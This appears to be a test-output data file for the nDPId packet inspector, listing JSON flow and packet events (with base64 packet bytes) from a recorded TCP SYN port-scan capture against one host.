+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsftgAACcGopqsEAAIQA2GNIzSBfHdUoMYAAAAAGACEAAingAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsN+EAACYG6pGsEAAIQA2GNIzSCDTdUoMYAAAAAGACDAAkWwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsqgcAADcGZ2usEAAIQA2GNIzSA+ndUoMYAAAAAGACEAAkpgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsDusAACwGDYisEAAIQA2GNIzSH5rdUoMYAAAAAGACBAAU9QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsCKQAADQGC8+sEAAIQA2GNIzSB3rdUoMYAAAAAGACBAAtFQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsNx4AACgG6VSsEAAIQA2GNIzSHwHdUoMYAAAAAGACBAAVjgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsdyIAADIGn1CsEAAIQA2GNIzTC77dU4MZAAAAAGACDAAgzgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsqZ8AADkGZdOsEAAIQA2GNIzTDGDdU4MZAAAAAGACCAAkLAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ+QAAC0G846sEAAIQA2GNIzTFlbdU4MZAAAAAGACCAAaNgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAstxwAADEGYFasEAAIQA2GNIzTJxrdU4MZAAAAAGACCAAJcgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsWJwAADUGutasEAAIQA2GNIzTwALdU4MZAAAAAGACCABwiQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAspbMAADUGbb+sEAAIQA2GNIzTRkTdU4MZAAAAAGACCADqRwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAszIwAADAGS+asEAAIQA2GNIzTDtndU4MZAAAAAGACBAAlswAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsOLAAADEG3sKsEAAIQA2GNIzTAFTdU4MZAAAAAGACCAAwOAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAs7mkAADAGKgmsEAAIQA2GNIzTDybdU4MZAAAAAGACBAAlZgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAs2sEAAC4GP7GsEAAIQA2GNIzTJQ3dU4MZAAAAAGACDAAHfwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsGVoAACcGCBmsEAAIQA2GNIzTJw\/dU4MZAAAAAGACEAABfQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsCYIAADoGBPGsEAAIQA2GNIzTFb7dU4MZAAAAAGACDAAWzgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsr3QAADgGYP6sEAAIQA2GNIzTFYbdU4MZAAAAAGACBAAfBgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsZqgAADEGsMqsEAAIQA2GNIzTwATdU4MZAAAAAGACCABwhwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsBTkAADYGDTqsEAAIQA2GNIzTgAvdU4MZAAAAAGACDACsgAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsZFYAAC4GthysEAAIQA2GNIzSBAXdUoMYAAAAAGACDAAoigAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsbxoAACUGtFisEAAIQA2GNIzSB0jdUoMYAAAAAGACCAApRwAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsjUUAACwGjy2sEAAIQA2GNIzSA4XdUoMYAAAAAGACBAAxCgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
